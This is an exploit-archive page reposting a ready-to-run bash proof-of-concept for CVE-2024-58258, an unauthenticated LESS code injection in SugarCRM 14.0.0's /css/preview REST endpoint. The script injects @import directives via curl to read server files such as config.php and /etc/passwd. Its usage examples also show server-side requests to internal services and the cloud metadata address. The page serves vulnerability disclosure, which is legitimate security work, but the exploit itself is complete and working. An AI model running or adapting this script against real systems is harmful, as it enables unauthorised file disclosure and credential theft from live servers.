SugarCRM 14.0.0 – SSRF/Code Injection

July 16, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title SugarCRM 14.0.0 – SSRF/Code Injection
Exploit ID EDB-ID:52365
Type exploitdb
Published 2025-07-16T00:00:00
Modified 2025-07-16T00:00:00

CVSS Information

CVSS Score 7.2
Severity HIGH
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE Information

  • CVE-2024-58258

Exploit Description

Exploit Title : SugarCRM 14.0.0 – SSRF/Code Injection Author: Egidio Romano aka EgiX…

Exploit Code

# Exploit Title : SugarCRM 14.0.0 – SSRF/Code Injection

# Author: Egidio Romano aka EgiX

# Email : [email protected]

# Software Link: https://www.sugarcrm.com

# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.

# CVE Reference: CVE-2024-58258

# Vulnerability Description:

User input passed through GET parameters to the /css/preview REST API

endpoint is not properly sanitized before parsing it as LESS code. This can

be exploited by remote, unauthenticated attackers to inject and execute

arbitrary LESS directives. By abusing the @import LESS statement, an

attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary

local files on the web server, potentially leading to the disclosure of

sensitive information.

# Proof of Concept:

#!/bin/bash

echo

echo “+———————————————————————-+”;

echo “| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
echo “+———————————————————————-+”;

if [ “$#” -ne 2 ]; then

echo -ne “\nUsage…..: $0 \n”

echo -ne “\nExample…: $0 ‘http://localhost/sugarcrm/’ ‘config.php'”

echo -ne “\nExample…: $0 ‘http://localhost/sugarcrm/’ ‘/etc/passwd'”

echo -ne “\nExample…: $0 ‘https://www.sugarcrm.com/’ ‘http://localhost:9200/_search'”

echo -ne “\nExample…: $0 ‘https://www.sugarcrm.com/’ ‘http://169.254.169.254/latest/meta-data/’\n\n”

exit 1

fi

urlencode() {

echo -n “$1” | xxd -p | tr -d ‘\n’ | sed ‘s/../%&/g’

}

INJECTION=$(urlencode “1; @import (inline) ‘$2’; @import (inline) ‘data:text/plain,________’;//”)

RESPONSE=$(curl -ks “${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}”)

if echo “$RESPONSE” | grep -q “________”; then

echo -e “\nOutput for ‘$2’:\n”

echo “$RESPONSE” | sed ‘/________/q’ | grep -v ‘________’

echo

else

echo -e “\nError: exploit failed!\n”

exit 2

fi

# Credits: Vulnerability discovered by Egidio Romano.

# Original Advisory: http://karmainsecurity.com/KIS-2025-04

# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.